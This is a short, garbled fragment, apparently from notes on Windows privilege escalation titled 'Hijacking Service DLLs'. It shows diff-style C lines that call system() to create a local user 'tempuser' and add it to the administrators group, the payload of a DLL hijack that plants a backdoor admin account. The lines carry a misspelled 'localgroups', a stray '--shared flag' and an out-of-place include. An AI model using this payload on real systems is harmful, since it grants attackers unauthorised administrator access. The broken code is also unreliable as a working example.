Windows Privilege and Access Control

 Hijacking Service DLLs

-int i; i = system("net user /ADD tempuser"); i = system("net localgroups administrators /ADD tempuser"); break;
+int i; i = system("net user /ADD tempuser"); i = system("net localgroups administrators /ADD tempuser"); break;--shared flag

 #include <windows.h>